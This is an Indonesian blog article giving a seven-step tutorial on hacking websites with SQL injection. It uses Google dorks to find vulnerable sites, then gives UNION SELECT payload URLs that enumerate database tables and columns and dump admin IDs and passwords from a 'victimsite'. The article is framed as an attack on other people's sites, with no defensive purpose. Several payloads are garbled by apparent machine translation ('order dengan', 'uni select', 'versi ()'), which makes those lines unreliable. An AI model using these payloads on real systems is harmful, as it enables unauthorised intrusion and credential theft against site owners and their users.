Hack Website Dengan SQL Injection

Written by

SQL atau yang dikenal dengan Structured Query Language merupakan command yang khusus digunakan untuk akses data yang terdapat dalam database . Awalnya SQL adalah suatu bahasa pemrograman yang mengikuti American Nasional Standard Institute ( ANSI ) , dan sampai saat ini , telah banyak perusahaan yang menggunakan bahasa pemrograman tersebut untuk me-record database karyawan maupun data penting yang berkaitan dengan penjualan . Untuk mempelajari bahasa pemrograman SQL , tidaklah semudah yang anda pikirkan . Dalam hal ini , akan ada banyak kode yang dapat membuat anda menjadi bingung . Namun dalam artikel ini , kita tidak akan berfokus untuk membahas tentang pembelajaran SQL , melainkan tentang mempelajari cara meng-hack sebuah website dengan menggunakan SQL Injection . Dan cara ini merupakan teknik tersulit dalam beberapa panduan lengkap hacking website lainnya , karena anda akan berurusan dengan kode pemrograman serta perlu mengkoneksikannya ke sebuah database . Berikut merupakan 7 langkah meng-hack website dengan menggunakan SQL Injection yang perlu anda pelajari :

Langkah 1: Mencari Kerentanan Website

google-dork-used-in-sqli

Dalam kasus ini , anda dapat menemukan kerentanan website dengan menggunakan daftar Google Dork. Kemudian Google Dork akan mencari kerentanan situs dengan menggunakan google untuk mencari trik. Ada banyak trik untuk melakukan pencarian di google. Tapi , dalam hal ini kita akan menggunakan “inurl:” yang merupakan perintah untuk menemukan kerentanan website .

contoh:

  • inurl:index.php?id=
  • inurl:Gallery.php?id=
  • inurl:article.php?id=
  • inurl:pageid =

Bagaimana menggunakan perintah tersebut ?

  • Copy salah satu perintah di atas dan paste di kotak mesin pencarian google , tekan enter.
  • Kemudian , Google akan menampilkan daftar situs web.
  • Setelah itu , anda dapat mengunjungi semua website untuk memeriksa kerentanan.
  • Dan anda dapat memulainya dari website pertama.

Catatan: jika Anda ingin hack situs web tertentu, kemudian anda dapat mencoba cara di bawah ini:

misalnya: www.victimsite.com inurl:index.php?id=

Langkah 2: Memeriksa Kerentanan Website

sql-tool4

Setelah anda menemukan kerentanan website. Maka anda dapat memeriksa kerentanan website dengan menambahkan quotes(‘) di akhir URL dan tekan enter. (NB : Tidak ada spasi di antara angka dan tanda kutip tunggal)

misalnya: www.victimsite.com/index.php?id=2’

Langkah 3: Mencari Jumlah Kolom

th

Jika anda telah memeriksa kerentanan suatu website. Maka langkah berikutnya yang perlu dilakukan adalah menemukan jumlah kolom dalam tabel. Kemudian , untuk mengganti quotes(‘) tunggal dengan pernyataan , maka anda dapat mengetikkan “order by n” yang akan menyisihkan jarak antara angka dengan urutan oleh pernyataan n. Setelah itu , anda dapat mengubah n menjadi angka yang dimulai dari 1,2,3,4,5,6,… sampai anda melihat error seperti “unknown kolom”.

misalnya:

http://www.victimsite.com/index.php?id=2 order dengan 1
http://www.victimsite.com/index.php?id=2 order dengan 2
http://www.victimsite.com/index.php?id=2 order dengan 3
http://www.victimsite.com/index.php?id=2 urutan oleh 4

Langkah 4: Menampilkan Kerentanan Kolom

sql-lead-function-to-find-gaps-in-number-sequence

Setelah anda sudah menemukan kolom yang ingin dicari , maka anda dapat menampilkan kerentanan kolom dengan menggunakan pilihan “Uni columns_sequence” yang dapat menemukan bagian kerentanan dari tabel. Setelah itu , anda perlu mengganti “order by n” dengan pernyataan dibawah ini , serta mengubah nilai id menjadi negatif

misalnya:

Jika jumlah kolom ada 7, maka query yang dapat anda input adalah sebagai berikut:
http://www.victimsite.com/index.php?id=-2 uni select 1,2,3,4,5,6,7–
Jika metode di atas tidak bekerja , kemudian anda dapat mencoba cara dibawah ini:
http://www.victimsite.com/index.php?id=-2 and 1 = 2 union select 1,2,3,4,5,6,7–

Langkah 5: Mencari Database

sql-injection-2

Sekarang ganti n dari query dengan “version()” , misalnya: www.victimsite.com/index.php?id=-2 and 1 = 2 union select 1,2, versi (), 4,5,6, 7– . Setelah itu , anda dapat mengganti version() dengan database() dan user() untuk mencari database masing-masing pengguna.

misalnya:

http://www.victimsite.com/index.php?id=-2 and 1 = 2 union select 1,2, database (), 4,5,6, 7–
http://www.victimsite.com/index.php?id=-2 and 1 = 2 union select 1,2, user (), 4,5,6, 7–

Jika cara di atas tidak bekerja, maka anda dapat mencoba cara di bawah ini:

http://www.victimsite.com/index.php?id=-2 and 1 = 2 union select 1,2,unhex(hex(@@version)), 4,5,6, 7–

Langkah 6: Mencari Nama Tabel

sql-injection-3

Selanjutnya , kita harus menemukan nama tabel database. Dan untuk menemukan nama tabel database , maka anda dapat mengganti database() dan user() dengan “group_concat (table_name) dan menambahkan” from information_schema.tables where table_schema=database() ”

misalnya : www.victimsite.com/index.php?id=-2 and 1 = 2 union select 1,2, group_concat (table_name), 4,5,6, 7 from information_schema.tables where table_schema=database()–

Dan cara ini akan menampilkan daftar nama tabel serta menemukan nama tabel yang terkait dengan admin atau pengguna. Kemudian anda dapat memilih tabel “admin”.

Langkah 7: Mencari nama kolom

mssql-all-columns-database

Setelah anda menemukan nama tabel yang terkait dengan admin , maka anda dapat mengganti “group_concat (table_name)” menjadi “group_concat(column_name)” . Selain itu , anda juga dapat mengganti “from information_schema.tables where table_schema=database() –” menjadi “from information_schema.columns where table_name = mysqlchar-

Dalam kasus ini , kita harus mengkonversi nama tabel ke format string MySql CHAR() . Dan untuk menemukan MysqlChar() , maka terlebih dahulu anda dapat menginstal addon HackBar yang dapat ditemukan di addons.Mozilla.org/en-US/Firefox/addon/3899/ . Kemudian pilih sql->Mysql->MysqlChar() . Ini akan membuka jendela kecil , setelah itu anda dapat memasukkan nama tabel yang ditemukan. Klik ok

Disamping itu , anda akan melihat CHAR (angka yang dipisahkan dengan comma) di Hack toolbar. Lalu copy dan paste kode di akhir url bukan “mysqlchar” , misalnya: www.victimsite.com/index.php?id=-2 and 1 = 2 union select 1,2, group_concat (column_name), 4,5,6, 7 from information_schema.columns where table_name = CHAR(97, 100, 109, 105, 110)-
Maka ini akan menampilkan daftar kolom seperti admin, password, admin_id, admin_name, admin_password, aktif, id, admin_pas s, ID_admin, admin_username, username, password, dll

Sekarang ganti group_concat(column_name) dengan group_concat(columnname,0x3a,anothercolumnname).

Catatan:

  • ColumnName harus diganti dari nama kolom yang terdaftar.
  • anothercolumnname harus ganti dari nama kolom yang terdaftar.

Serta anda juga dapat mengganti “from information_schema.columns where table_name = CHAR (97, 100, 109, 105, 110)” menjadi “from table_name”

misalnya: www.victimsite.com/index.php?id=-2 dan 1 = 2 union select 1,2, group_concat (admin_id, 0x3a, admin_password), 4,5,6, 7 from admin–

Demikianlah teknik ini , kami paparkan kepada semua pembaca . Kami berharap teknik yang ada didalam artikel ini dapat menjadi bermanfaat bagi setiap pembaca . Dan atas perhatian dari semua pembaca , maka kami mengucapkan terima kasih . See you next time .

Article Categories:
tekno

Comments are closed.

Facebook Auto Publish Powered By : XYZScripts.com